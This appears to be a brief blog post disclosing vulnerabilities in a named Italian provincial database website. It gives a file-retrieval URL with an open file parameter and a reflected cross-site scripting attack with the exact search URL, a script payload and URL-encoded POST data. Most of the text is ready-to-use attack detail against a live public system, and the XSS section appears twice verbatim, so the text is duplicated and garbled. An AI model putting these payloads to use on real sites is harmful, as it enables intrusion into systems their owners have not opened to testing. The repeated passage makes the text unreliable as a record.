http://ecadb.provincia.fe.it/samiraeca/fe/getimage.do?file={your file}
(requests shouldn't be done via browser but with a simple client)
_________________________________________
XSS
http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do
Just use a
a simple search with a term that can be found (ex. "este") and the option to find any submitted word
este <script>alert(1);</script>
Sample POST DATA
value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1
_________________________________________
Etc
(requests shouldn't be done via browser but with a simple client)
_________________________________________
XSS
http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do
Just use a
a simple search with a term that can be found (ex. "este") and the option to find any submitted word
este <script>alert(1);</script>
Sample POST DATA
value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1
_________________________________________
Etc
Comments
Post a Comment